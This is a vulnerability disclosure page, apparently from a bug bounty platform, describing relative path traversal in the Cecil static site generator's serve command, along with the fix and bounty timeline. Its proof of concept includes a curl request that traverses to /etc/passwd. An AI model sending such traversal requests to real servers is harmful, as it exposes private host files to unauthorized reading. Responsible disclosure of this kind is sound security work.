Relative Path Traversal vulnerability in the serve command in cecilapp/cecil

Valid

Reported on

Sep 7th 2023

Description

When a Cecil site is served by cecil serve, Relative Path Traversal is possible via the URI path.

Proof of Concept

Run the following commands:

mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve

Then curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd.

Impact

When a Cecil site is served by cecil serve, unauthenticated remote attackers can read any file on the host filesystem.

We are processing your report and will contact the cecilapp/cecil team within 24 hours. 3 months ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 3 months ago

We have contacted a member of the cecilapp/cecil team and are waiting to hear back 3 months ago

Arnaud Ligny validated this vulnerability 3 months ago

Yufan You has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Arnaud Ligny marked this as fixed in 7.47.1 with commit 00dc79 3 months ago

Arnaud Ligny has been awarded the fix bounty

This vulnerability has been assigned a CVE

Arnaud Ligny published this vulnerability 3 months ago

to join this conversation